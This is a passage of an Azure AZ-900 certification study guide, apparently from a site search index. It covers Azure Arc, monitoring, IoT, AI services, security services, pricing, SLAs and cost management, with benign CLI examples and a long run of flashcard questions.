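                            # Transpile Bicep to an ARM JSON template (optional; deployment accepts .bicep directly)\naz bicep build --file main.bicep\n\n# Deploy the Bicep file at resource-group scope\naz deployment group create --resource-group demo-rg --template-file main.bicep\n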
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-arc","title":"Azure Arc","text":"

                            Azure Arc is a bridge that extends the Azure platform to help you build applications and services with the flexibility to run across datacenters, at the edge, and in multicloud environments. Develop cloud-native applications with a consistent development, operations, and security model. Azure Arc runs on both new and existing hardware, virtualization and Kubernetes platforms, IoT devices, and integrated systems.

                            Azure Arc is not just a "single pane" of control for cloud and on-premises. Azure Arc takes Azure's all-important control plane, namely the Azure Resource Manager (ARM), and extends it outside of Azure. To understand the implication of that statement, it helps to go over a few ARM terms.

                            In utilizing Azure Resource Manager (ARM), Arc lets you extend your Azure compliance and monitoring to your hybrid and multi-cloud configurations. Azure Arc simplifies governance and management by delivering a consistent multi-cloud and on-premises management platform.

                            Azure Arc provides a centralized, unified way to:

                            • Manage your entire environment together by projecting your existing non-Azure resources into ARM.
                            • Manage multi-cloud and hybrid virtual machines, Kubernetes clusters, and databases as if they are running in Azure.
                            • Use familiar Azure services and management capabilities, regardless of where they live.
                            • Continue using traditional ITOps while introducing DevOps practices to support new cloud and native patterns in your environment.
                            • Configure custom locations as an abstraction layer on top of Azure Arc-enabled Kubernetes clusters and cluster extensions.

                            Currently, Azure Arc allows you to manage the following resource types hosted outside of Azure:

                            • Servers
                            • Kubernetes clusters
                            • Azure data services
                            • SQL Server
                            • Virtual machines (preview)
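
                            As a rough sketch of onboarding one of those external servers, assuming the Azure Connected Machine agent (azcmagent) is already installed on it; every identifier below is a placeholder:

                            # Run on the non-Azure server to project it into ARM as an Azure Arc-enabled server\nazcmagent connect --resource-group "az_arc_rg" --tenant-id "<tenant-id>" --subscription-id "<subscription-id>" --location "eastus"\n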
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-monitoring-tools","title":"Azure Monitoring tools","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-advisor_1","title":"Azure Advisor","text":"

                            Azure Advisor evaluates your Azure resources and makes recommendations to help improve reliability, security, and performance, achieve operational excellence, and reduce costs. Azure Advisor is designed to help you save time on cloud optimization. The recommendation service includes suggested actions you can take right away, postpone, or dismiss.

                            The recommendations are divided into five categories:

                            • Reliability is used to ensure and improve the continuity of your business-critical applications.
                            • Security is used to detect threats and vulnerabilities that might lead to security breaches.
                            • Performance is used to improve the speed of your applications.
                            • Operational Excellence is used to help you achieve process and workflow efficiency, resource manageability, and deployment best practices.
                            • Cost is used to optimize and reduce your overall Azure spending.

                            Azure Monitor, Service Health, and Azure Advisor all use action groups to notify you when an alert has been triggered.
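
                            A hedged one-liner for pulling Advisor output from the Azure CLI (assuming recommendations have already been generated for the subscription):

                            # List Azure Advisor cost recommendations in a readable table\naz advisor recommendation list --category Cost --output table\n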

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-service-health","title":"Azure Service Health","text":"

                            Microsoft Azure provides a global cloud solution to help you manage your infrastructure needs, reach your customers, innovate, and adapt rapidly. Azure Service Health helps you keep track of Azure resources, both your specifically deployed resources and the overall status of Azure. It does this by combining three different Azure services:

                            • Azure Status informs you of service outages in Azure on the Azure Status page. The page is a global view of the health of all Azure services across all Azure regions.
                            • Service Health provides a narrower view of Azure services and regions. It focuses on the Azure services and regions you're using. This is the best place to look for service-impacting communications about outages, planned maintenance activities, and other health advisories, because the authenticated Service Health experience knows which services and resources you currently use. You can even set up Service Health alerts to notify you when service issues, planned maintenance, or other changes may affect the Azure services and regions you use.
                            • Resource Health is a tailored view of your actual Azure resources. It provides information about the health of your individual cloud resources, such as a specific virtual machine instance, and helps you diagnose issues. You can obtain support when an Azure service issue affects your resources.

                            By using Azure Status, Service Health, and Resource Health, Azure Service Health gives you a complete view of your Azure environment, all the way from the global status of Azure services and regions down to specific resources.

                            Something you initially thought was a simple anomaly but that turned into a trend can readily be reviewed and investigated thanks to the historical alerts.

                            Azure Monitor, Service Health, and Azure Advisor all use action groups to notify you when an alert has been triggered.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-monitor","title":"Azure Monitor","text":"

                            Azure Monitor is a platform for collecting data on your resources, analyzing that data, visualizing the information, and even acting on the results. Azure Monitor can monitor Azure resources, your on-premises resources, and even multi-cloud resources like virtual machines hosted with a different cloud provider.

                            Azure Monitor, Service Health, and Azure Advisor all use action groups to notify you when an alert has been triggered.

                            As soon as you create an Azure subscription and start deploying resources, Azure Monitor begins collecting data. Azure Monitor is a platform that collects metric and logging data, such as CPU percentages. The data can be used to trigger autoscaling.

                            Which Azure service can generate an alert if virtual machine utilization is over 80% for five minutes? Azure Monitor.
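
                            That exam scenario maps to a metric alert rule. A minimal sketch with the Azure CLI, assuming a VM resource ID in $VM_ID and an existing action group ID in $AG_ID:

                            # Alert when average CPU exceeds 80% over a 5-minute window, evaluated every minute\naz monitor metrics alert create --name cpu-over-80 --resource-group demo-rg --scopes "$VM_ID" --condition "avg Percentage CPU > 80" --window-size 5m --evaluation-frequency 1m --action "$AG_ID"\n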

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-log-analytics","title":"Azure Log Analytics","text":"

                            Azure Log Analytics is the tool in the Azure portal where you'll write and run log queries on the data gathered by Azure Monitor. Log Analytics is a robust tool that supports both simple and complex queries as well as data analysis. You can write a simple query that returns a set of records and then use features of Log Analytics to sort, filter, and analyze the records. You can write an advanced query to perform statistical analysis and visualize the results in a chart to identify a particular trend.

                            Activity Logs record when resources are created or modified.
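
                            A hedged sketch of running a Kusto query from the Azure CLI; the workspace GUID is a placeholder, and the AzureActivity table assumes activity logs are being collected into the workspace:

                            # Top 5 operations recorded in the workspace's activity logs\naz monitor log-analytics query --workspace "<workspace-guid>" --analytics-query "AzureActivity | summarize count() by OperationNameValue | top 5 by count_"\n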

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-monitor-alerts","title":"Azure Monitor Alerts","text":"

                            Azure Monitor Alerts are an automated way to stay informed when Azure Monitor detects a threshold being crossed. You set the alert conditions and the notification actions, and then Azure Monitor Alerts notifies you when an alert is triggered. Depending on your configuration, Azure Monitor Alerts can also attempt corrective action.

                            Alerts can be set up to monitor the logs and trigger on certain log events, or they can be set to monitor metrics and trigger when certain metrics are crossed. Azure Monitor Alerts use action groups to configure who to notify and what action to take. An action group is simply a collection of notification and action preferences that you associate with one or multiple alerts.
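
                            A minimal sketch of an action group with a single email receiver, created with the Azure CLI; the names and address are hypothetical:

                            # Create an action group that emails the on-call admin when an associated alert fires\naz monitor action-group create --name ops-alerts --resource-group demo-rg --short-name opsag --action email oncall-admin alice@example.com\n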

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#application-insights","title":"Application Insights","text":"

                            Application Insights, an Azure Monitor feature, monitors your web applications. Application Insights is capable of monitoring applications that are running in Azure, on-premises, or in a different cloud environment.

                            There are two ways to configure Application Insights to help monitor your application. You can either install an SDK in your application, or you can use the Application Insights agent. The Application Insights agent is supported in C#.NET, VB.NET, Java, JavaScript, Node.js, and Python.

                            Once Application Insights is up and running, you can use it to monitor a broad array of information, such as:

                            • Request rates, response times, and failure rates
                            • Dependency rates, response times, and failure rates, to show whether external services are slowing down performance
                            • Page views and load performance reported by users' browsers
                            • AJAX calls from web pages, including rates, response times, and failure rates
                            • User and session counts
                            • Performance counters from Windows or Linux server machines, such as CPU, memory, and network usage
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-iot","title":"Azure IoT","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-iot-hub","title":"Azure IoT Hub","text":"

                            Azure IoT Hub is an Azure-hosted service that functions as a message hub for bidirectional communication between the deployed IoT devices and Azure services. You can connect millions of devices and their backend solutions reliably and securely. Almost any device can be connected to an IoT hub.

                            Several messaging patterns are supported, including device-to-cloud telemetry, uploading files from devices, and request-reply methods to control your devices from the cloud. IoT Hub also supports monitoring to help you track device creation, device connections, and device failures.

                            IoT Hub can further route messages to Azure Data Lake Storage.
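
                            A hedged sketch of standing up a hub and registering one device with the Azure CLI; the device-identity command comes from the azure-iot extension, and all names are placeholders:

                            # Create an IoT hub in the S1 (standard) tier\naz iot hub create --name demo-iot-hub --resource-group demo-rg --sku S1\n\n# Register a device identity (requires: az extension add --name azure-iot)\naz iot hub device-identity create --hub-name demo-iot-hub --device-id device-001\n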

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-iot-central","title":"Azure IoT Central","text":"

                            Built on the functions provided by IoT Hub, it provides visualization, control, and management features for IoT devices. You can connect devices, view telemetry, view overall device performance, create and manage alerts, or even push updates to devices.

                            IoT Central has device templates to facilitate management.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-sphere","title":"Azure Sphere","text":"

                            Azure Sphere is an integrated IoT solution that consists of three key parts:

                            • Azure Sphere micro-controller units (MCUs): a hardware component built into the IoT devices that runs the OS and processes signals from attached sensors.
                            • Management software: a custom Linux operating system that manages communication with the security service and runs the vendor's device software.
                            • Azure Sphere Security Service (AS3): handles certificate-based device authentication to Azure, ensures that the device has not been compromised, and pushes OS and other software updates to the device as needed.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-artificial-intelligence","title":"Azure Artificial Intelligence","text":"

                            AI falls into two broad categories: deep learning and machine learning.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-machine-learning","title":"Azure Machine Learning","text":"

                            Collection of Azure services and tools that enable you to use data to train and validate models. It provides multiple services and features, such as Azure Machine Learning Studio, a web portal through which developers can create no-code and code-first solutions.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-cognitive-services","title":"Azure Cognitive Services","text":"

                            Azure Cognitive Services provides machine learning models to interact with humans and perform cognitive functions that humans would normally do: language, speech, vision, and decision.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-bot-service","title":"Azure Bot Service","text":"

                            Azure Bot Service enables you to create and use virtual agents to interact with users.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-devops","title":"Azure DevOps","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-devops-services","title":"Azure DevOps Services","text":"

                            This is not a single service but rather a group of services:

                            • Azure Artifacts
                            • Azure Boards
                            • Azure Pipelines
                            • Azure Repos
                            • Azure Test Plans
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#github-and-github-actions","title":"GitHub and GitHub Actions","text":"

                            GitHub and GitHub Actions offer many of the same functions as Azure DevOps Services. Generally speaking, GitHub is the appropriate choice for collaborating on open-source projects, and Azure DevOps is the appropriate choice for enterprise/internal projects.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-devtest-labs","title":"Azure DevTest Labs","text":"

                            Azure DevTest Labs automates the deployment, configuration, and decommissioning of VMs and other Azure resources.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-for-defense","title":"Azure for defense","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-firewall","title":"Azure Firewall","text":"

                            Azure Firewall allows you to centrally create, enforce, and log application and network connectivity policies across subscriptions and virtual networks.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-ddos-protection","title":"Azure DDoS Protection","text":"

                            Azure DDoS Protection Standard can provide full layer 3 to layer 7 mitigation capability.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-sentinel","title":"Azure Sentinel","text":"

                            SIEM + SOAR: Azure Sentinel combines security information and event management (SIEM) with security orchestration, automation, and response (SOAR).

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-pricing-service-level-agreements-and-lifecycle","title":"Azure Pricing, Service Level Agreements, and Lifecycle","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#pricing","title":"Pricing","text":"

                            There are free and paid subscriptions:

                            • Free trial: 12 months of select free services and a credit of $200 (as of September 2023) to use on any Azure service for 30 days. Services are disabled when the time or credit expires. Convertible to a paid subscription.
                            • Pay-as-you-go: typical consumption cloud model.
                            • Member offers: Some products or services provide credits toward Azure Services.

                            Subscriptions don't enable you to access Azure services per se. For that, you need to purchase services through:

                            • Enterprise agreement.
                            • Web Direct.
                            • Cloud Solution Provider (or CSP).

                            If you want to raise the limit or quota above the default limit, \"open an online customer support request at no charge\". (Correct)

                            Billing zone: Geographical grouping of Azure regions for billing Azure resources.

                            Tools: Azure Advisor

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#service-level-agreements","title":"Service Level Agreements","text":"

                            A Service Level Agreement (SLA) is an agreement between a service provider and a consumer that generally guarantees that the SLA-backed service will be available for a specific period during the month. Maximum monthly downtime by SLA:

                            • 99% SLA -> 7.2 hours
                            • 99.9% SLA -> 43.2 minutes
                            • 99.95% SLA -> 21.6 minutes
                            • 99.99% SLA -> 4.32 minutes
                            • 99.999% SLA -> 25.9 seconds

                            A key point: If an Azure service is available but with degraded performance, it still meets the SLA. The service must be completely unavailable to fail the SLA and qualify for a service credit.

                            In addition to having different SLAs, each Azure service also has its own service credits. Generally, the higher the SLA, the lower the service credit will be.

                            SIE is the acronym for Service Impacting Event.

                            Composite SLA is the SLA that results from combining services with potentially different SLAs. To determine the composite SLA, you simply multiply the SLA values for each resource.

                            Tip for the exam: Deploying instances of a VM across two or more availability zones raises the SLA for the VM from 99.9% to 99.99%, while placing VM instances behind a load balancer gives a composite SLA equal to the product of the individual SLAs (for example, a 99.95% VM tier behind a 99.99% load balancer yields 0.9995 × 0.9999 ≈ 99.94%).

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#service-lifecycle-in-azure","title":"Service Lifecycle in Azure","text":"

                            Previews allow you to test a pre-release version of a service. Previews have their own terms and conditions, and some of them don't have customer support at all. Even though you may see a service in preview, that doesn't mean it is ready for a production environment.

                            • Private Preview: Azure feature available to certain Azure customers for evaluation purposes.
                            • Public Preview: Azure feature available to all Azure customers for evaluation purposes. Accessible from the Azure Portal.

                            Preview features can be accessed at the Azure Portal Preview.

                            General availability means that the service, application, or feature is available for all Azure customers.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#cost-management","title":"Cost Management","text":"

                            Three cloud pricing models:

                            • Pay-as-you-go: Suitable for development, testing, short-term projects, and businesses that prefer OpEx over CapEx.
                            • Reserved instances: commit to a specific VM type and size for a fixed term (1 or 3 years) in exchange for discounted pricing. Suitable for long-term projects with predictable resource requirements and businesses looking to optimize costs. Because you prepay, cost savings can be significant, up to 70% or more. Reservations do not automatically renew, however, and pricing reverts to pay-as-you-go when the reservation term expires.
                            • Spot pricing: take advantage of unused Azure capacity at a significant discount. Azure can terminate spot instances at any time; cost-effective, but with no guarantees. Suitable for batch processing, data analysis, and non-critical dev and testing, that is, cost-sensitive but interruptible tasks.
                            • Azure Hybrid Benefit: for those who have perpetual licenses of a service and want to move their services to Azure, Azure Hybrid Benefit enables them to repurpose these licenses and gain corresponding cost savings. But it's specific to Windows Server and SQL Server, not to all Microsoft licenses that your organization owns.

                            The OpEx cost can be impacted by many factors:

                            • Resource type: When you provision an Azure resource, Azure creates metered instances for that resource. The meters track the resource's usage and generate a usage record that is used to calculate your bill. Azure creates usage meters automatically when you deploy a resource, so you can track service usage. Usage captured by each meter results in a certain number of billable units, and those billable units are converted to charges based on resource type. One billable unit for a particular service will differ in value from a billable unit for another service.
                            • Uptime.
                            • Consumption: Pay-as-you-go payment model where you pay for the resources that you use during a billing cycle. Azure also offers the ability to commit to using a set amount of cloud resources. When you reserve capacity, you're committing to using and paying for a certain amount of Azure resources during a given period (typically one or three years).
                            • Geography or resource allocation: The cost of power, labor, taxes, and fees vary depending on the location. Due to these variations, Azure resources can differ in costs to deploy depending on the region.
                            • Network Traffic: Bandwidth refers to data moving in and out of Azure datacenters. Some inbound data transfers (data going into Azure datacenters) are free. For outbound data transfers (data leaving Azure datacenters), data transfer pricing is based on zones.
                            • Subscription type: Some Azure subscription types also include usage allowances, which affect costs.
                            • Azure Marketplace: Azure Marketplace lets you purchase Azure-based solutions and services from third-party vendors. Try to avoid recurring costs associated with an offering from a third-party provider in Azure Marketplace.

                            Additionally, it's necessary to pay attention to small details. For example, every time you provision a VM, additional resources such as storage and networking are also provisioned. If you deprovision the VM, those additional resources may not deprovision at the same time, whether intentionally or unintentionally. Maintenance is needed in order to keep costs adjusted.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#pricing-calculator","title":"Pricing calculator","text":"

                            This service helps you choose the best Azure resources for your needs given a budget. With the pricing calculator, you can estimate the cost of any provisioned resources, including compute, storage, and associated network costs. You can even account for different storage options like storage type, access tier, and redundancy.

                            https://azure.microsoft.com/en-us/pricing/calculator/

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#tco-calculator","title":"TCO calculator","text":"

                            Total Cost of Ownership Calculator (TCO calculator) helps you compare the costs for running an on-premises infrastructure compared to an Azure Cloud infrastructure. With the TCO calculator, you enter your current infrastructure configuration, including servers, databases, storage, and outbound network traffic. The TCO calculator then compares the anticipated costs for your current environment with an Azure environment supporting the same infrastructure requirements.

                            https://azure.microsoft.com/en-us/pricing/tco/calculator/

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#microsoft-cost-management-tool-or-azure-cost-management-billing","title":"Microsoft Cost Management tool - or Azure Cost Management + Billing","text":"

                            If you accidentally provision new resources, you may not be aware of them until it's time for your invoice. Cost Management is a service that helps avoid those situations. Cost Management provides the ability to quickly check Azure resource costs, create alerts based on resource spend, and create budgets that can be used to automate management of resources.

                            Two key words so far: alerts and budgets.

                            Cost analysis is a subset of Cost Management that provides a quick visual for your Azure costs. Using cost analysis, you can quickly view the total cost in a variety of different ways, including by billing cycle, region, resource, and so on. A budget is where you set a spending limit for Azure.

                            Budgets: You can set budgets based on a subscription, resource group, service type, or other criteria. When you set a budget, you will also set a budget alert. (A CLI sketch follows the alert-type list below.)

                            Cost alerts provide a single location to quickly check on all of the different alert types that may show up in the Cost Management service. The three types of alerts that may show up are:

                            • Budget alerts: Budget alerts support both cost-based and usage-based budgets (Budgets are defined by cost or by consumption usage when using the Azure Consumption API).
                            • Credit alerts: Credit alerts are generated automatically at 90% and at 100% of your Azure credit balance. Whenever an alert is generated, it's reflected in cost alerts, and in the email sent to the account owners.
                            • Department spending quota alerts: Department spending quota alerts notify you when department spending reaches a fixed threshold of the quota.
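
                            A hedged sketch of creating a subscription-level cost budget from the Azure CLI; the az consumption commands are in preview, and the name, amount, and dates are placeholders:

                            # Create a $500 monthly cost budget for the current subscription\naz consumption budget create --budget-name monthly-cap --amount 500 --category cost --time-grain monthly --start-date 2024-06-01 --end-date 2025-06-01\n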
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#flashcard-questions","title":"Flashcard questions","text":"

                            What is Cloud computing?

                            The delivery of computing services, such as servers, storage, databases, and networking, over the Internet to provide faster innovation, flexible resources, and economies of scale.

                            How does cloud computing lower operating costs?

                            By only paying for the cloud services used, rather than the capital expense of buying hardware and setting up on-site datacenters.

                            Why do organizations move to the cloud?

                            For cost savings, improved speed and scalability, increased productivity, better performance, reliability, and improved security.

                            What is the advantage of cloud computing's self-service and on-demand nature?

                            It allows for vast amounts of computing resources to be provisioned quickly, giving businesses a lot of flexibility and taking the pressure off capacity planning.

                            What does \"elastically scaling\" mean in cloud computing?

                            Delivering the right amount of IT resources, such as computing power and storage, at the right time and from the right location.

                            How does cloud computing improve productivity?

                            By removing the need for time-consuming IT management tasks, allowing IT teams to focus on more important business goals.

                            How does cloud computing improve performance?

                            By running on a worldwide network of secure datacenters that are regularly upgraded to the latest generation of efficient computing hardware, reducing network latency and offering greater economies of scale.

                            How does cloud computing improve reliability?

                            By making data backup, disaster recovery, and business continuity easier and less expensive through data mirroring at multiple redundant sites on the cloud provider's network.

                            How does cloud computing improve security?

                            By offering a broad set of policies, technologies, and controls that strengthen the overall security posture, protecting data, apps, and infrastructure from potential threats.

                            What is the main advantage of using cloud computing?

                            Cost savings, improved speed and scalability, increased productivity, better performance, reliability, and improved security.

                            What is the biggest difference between cloud computing and traditional IT resources?

                            Traditional IT resources required buying hardware and software, setting up and running on-site datacenters, and paying for electricity and IT experts. Cloud computing eliminates these expenses and provides flexible and on-demand resources.

                            What are the benefits of cloud computing services?

                            Faster innovation, flexible resources, and economies of scale.

                            What is the advantage of cloud computing over traditional on-site datacenters?

                            Cloud computing eliminates the need for hardware setup, software patching, and other time-consuming IT management tasks, allowing IT teams to focus on more important business goals.

                            What is the advantage of cloud computing over a single corporate datacenter?

                            Reduced network latency for applications and greater economies of scale.

                            What is the main advantage of data backup, disaster recovery, and business continuity in cloud computing?

                            It is easier and less expensive.

                            What is the main advantage of security in cloud computing?

                            Cloud providers offer a broad set of policies, technologies, and controls that strengthen the overall security posture.

                            What is the shared responsibility model in cloud computing?

                            The shared responsibility model in cloud computing refers to the division of responsibilities between the cloud provider and the customer in terms of security tasks and workloads.

                            What are the different types of cloud deployment?

                            The different types of cloud deployment are Software as a Service (SaaS), Platform as a Service (PaaS), Infrastructure as a Service (IaaS), and on-premises datacenter.

                            In which type of deployment do customers retain the most responsibilities?

                            In an on-premises datacenter, customers retain the most responsibilities, as they own the entire stack.

                            What responsibilities are always retained by the customer, regardless of the type of deployment?

                            The responsibilities retained by the customer regardless of the type of deployment are data, endpoints, account, and access management.

                            In a SaaS deployment, which party is responsible for protecting the security of the data?

                            In a SaaS deployment, the customer is responsible for protecting the security of the data.

                            In a PaaS deployment, who is responsible for managing and maintaining the underlying infrastructure?

                            In a PaaS deployment, the cloud provider is responsible for managing and maintaining the underlying infrastructure.

                            In an IaaS deployment, who is responsible for managing and maintaining the operating systems and middleware?

                            In an IaaS deployment, the customer is responsible for managing and maintaining the operating systems and middleware.

                            What are the three broad categories of cloud computing services?

                            Infrastructure as a Service (IaaS), Platform as a Service (PaaS), and Software as a Service (SaaS)

                            What are the benefits of migrating your organization's infrastructure to an IaaS solution?

                            Migrating to IaaS helps reduce maintenance of on-premises data centers, save money on hardware costs, and gain real-time business insights. It also gives you the flexibility to scale IT resources up and down with demand and quickly provision new applications.

                            Is lift-and-shift migration a common business scenario for using IaaS?

                            Yes. Lift-and-shift migration is a common business scenario for using IaaS. It is the fastest and least expensive method of migrating an application or workload to the cloud.

                            What is PaaS and how does it differ from IaaS?

                            Platform as a service (PaaS) is a complete development and deployment environment in the cloud, with resources that enable you to deliver everything from simple cloud-based apps to sophisticated, cloud-enabled enterprise applications. PaaS includes infrastructure such as servers, storage, and networking, but also middleware, development tools, business intelligence services, and more. IaaS only includes infrastructure resources.

                            How does PaaS differ from SaaS?

                            PaaS provides a complete development and deployment environment in the cloud, including infrastructure, middleware, development tools, and more. SaaS is a type of cloud service where users access software applications over the internet, without the need for installation or maintenance.

How does SaaS work?

                            With SaaS, users connect to the software over the Internet, usually with a web browser. The service provider manages the hardware and software, and with the appropriate service agreement, will ensure the availability and the security of the app and your data.

                            What are some common examples of SaaS?

                            Common examples of SaaS are email, calendaring, and office tools (such as Microsoft Office 365).

                            What are the components of SaaS?

                            The components of SaaS include hosted applications/apps, development tools, database management, business analytics, operating systems, servers and storage, networking firewalls/security, and data center physical plant/building.

What are the benefits of using SaaS for an organization?

                            SaaS provides a complete software solution that you purchase on a pay-as-you-go basis from a cloud service provider. It allows your organization to get quickly up and running with an app at minimal upfront cost.

                            What is a region in Azure?

                            A region in Azure is a geographical area on the planet that contains at least one but potentially multiple datacenters that are nearby and networked together with a low-latency network.

                            Why are regions important in Azure?

                            Regions are important in Azure because they provide flexibility to bring applications closer to users no matter where they are, global regions provide better scalability and redundancy, and they preserve data residency for services.

                            What are some examples of special Azure regions?

                            Examples of special Azure regions include US DoD Central, US Gov Virginia, US Gov Iowa, China East, and China North.

                            What are availability zones in Azure?

                            Availability zones in Azure are created by using one or more datacenters, and there is a minimum of three zones available within a single region.

                            What are region pairs in Azure?

                            Each Azure region is paired with another region within the same geography (such as US, Europe, or Asia) at least 300 miles away. This allows for the replication of resources across a geography and helps reduce the likelihood of interruptions because of events such as natural disasters, civil unrest, power outages, or physical network outages that affect both regions at once.

                            What are the advantages of region pairs in Azure?

Advantages of region pairs in Azure include automatic geo-redundant storage and prioritization of one region out of every pair in the event of an extensive Azure outage. Planned Azure updates are rolled out to paired regions one region at a time to minimize downtime and the risk of application outages.

                            What is the purpose of region pairs in Azure?

                            The purpose of region pairs in Azure is to provide reliable services and data redundancy by replicating resources across a geography and reducing the likelihood of interruptions because of events such as natural disasters, civil unrest, power outages, or physical network outages that affect both regions at once.

                            What happens if a region in a region pair is affected by a natural disaster in Azure?

                            If a region in a region pair is affected by a natural disaster in Azure, services will automatically failover to the other region in its region pair.

                            How does Azure provide a high guarantee of availability?

                            Azure provides a high guarantee of availability by having a broadly distributed set of datacenters, creating region pairs that are directly connected and far enough apart to be isolated from regional disasters, and offering automatic geo-redundant storage and failover capabilities.

                            What is the difference between regions, geographies, and availability zones in Azure?

                            In Azure, regions are geographical areas on the planet that contain at least one but potentially multiple datacenters that are nearby and networked together with a low-latency network. Geographies refer to the larger geographical area that a region is located in, such as US, Europe, or Asia. Availability zones are created by using one or more datacenters and there is a minimum of three zones within a single region.

                            What is an availability zone?

                            Availability zones are physically separate datacenters within an Azure region that are equipped with independent power, cooling, and networking, and are connected through high-speed, private fiber-optic networks.

                            What is the purpose of availability zones?

                            The purpose of availability zones is to provide high availability for mission-critical applications by creating duplicate hardware environments, in case one goes down.

                            How are availability zones connected?

                            Availability zones are connected through high-speed, private fiber-optic networks.

                            What types of Azure services support availability zones?

                            VMs, managed disks, load balancers, and SQL databases support availability zones.

                            What are zonal services?

                            Zonal services are resources that are pinned to a specific zone, such as VMs, managed disks, and IP addresses.

                            What are zone-redundant services?

                            Zone-redundant services are services that the platform replicates automatically across zones, such as zone-redundant storage and SQL Database.

                            What are non-regional services?

                            Non-regional services are services that are always available from Azure geographies and are resilient to zone-wide outages as well as region-wide outages.
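For a concrete feel of a zonal deployment, here is a minimal az CLI sketch that pins a VM to a specific availability zone; the resource group, VM name, image alias, and region are hypothetical placeholders:

```
# Create a resource group, then pin a VM to availability zone 1 (a zonal resource)
az group create --name demo-rg --location eastus

az vm create \
  --resource-group demo-rg \
  --name zonal-vm \
  --image Ubuntu2204 \
  --zone 1 \
  --generate-ssh-keys
```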

                            What is a resource in Azure?

                            A manageable item that's available through Azure. Virtual machines (VMs), storage accounts, web apps, databases, and virtual networks are examples of resources.

                            What is a resource group in Azure?

                            A container that holds related resources for an Azure solution. The resource group includes resources that you want to manage as a group.

                            What is the purpose of a resource group in Azure?

                            The purpose of a resource group is to help manage and organize Azure resources by placing resources of similar usage, type, or location in a resource group.

                            Can a resource belong to multiple resource groups in Azure?

                            No, a resource can only be a member of a single resource group.

                            Can resource groups be nested in Azure?

                            No, resource groups can't be nested.

                            What happens when a resource group is deleted in Azure?

                            When a resource group is deleted, all resources contained within it are also deleted.

                            How can resource groups be used for authorization in Azure?

                            Resource groups are also a scope for applying role-based access control (RBAC) permissions. By applying RBAC permissions to a resource group, you can ease administration and limit access to allow only what's needed.
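As a small illustration of RBAC scoped to a resource group, the az CLI supports assignments like the following; the user and resource group names are hypothetical:

```
# Grant Reader access on a single resource group only
az role assignment create \
  --assignee user@contoso.com \
  --role "Reader" \
  --resource-group demo-rg
```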

                            What is the relationship between resources and resource groups in Azure?

                            All resources must be in a resource group, and a resource can only be a member of a single resource group.

                            What is an Azure subscription?

                            An Azure subscription is a logical unit of Azure services that links to an Azure account, which is an identity in Azure Active Directory (Azure AD) or in a directory that Azure AD trusts. It provides authenticated and authorized access to Azure products and services and allows you to provision resources.

                            What are the two types of subscription boundaries in Azure?

                            The two types of subscription boundaries in Azure are Billing boundary and Access control boundary.

                            What happens when you delete a subscription in Azure?

                            When you delete a subscription in Azure, all resources contained within it are also deleted.

                            What is the purpose of creating a billing profile in Azure?

The purpose of creating a billing profile in Azure is to give it its own monthly invoice and payment method.

                            How can you manage costs in Azure?

                            You can manage costs in Azure by creating multiple subscriptions for different types of billing requirements, and Azure generates separate billing reports and invoices for each subscription so that you can organize and manage costs.

                            What is the purpose of resource access control in Azure?

                            The purpose of resource access control in Azure is to manage and control access to the resources that users provision within each subscription.

What is the purpose of an Azure management group?

Azure management groups provide a level of scope above subscriptions for efficiently managing access, policies, and compliance for those subscriptions.

                            How do management groups affect subscriptions?

                            All subscriptions within a management group automatically inherit the conditions applied to the management group.

                            Can all subscriptions within a single management group trust different Azure AD tenants?

                            No, all subscriptions within a single management group must trust the same Azure AD tenant.

                            How can management groups be used for governance?

                            You can apply policies to a management group that limit the regions available for VM creation, for example, which would be applied to all management groups, subscriptions, and resources under that management group.

                            How can management groups be used to provide user access to multiple subscriptions?

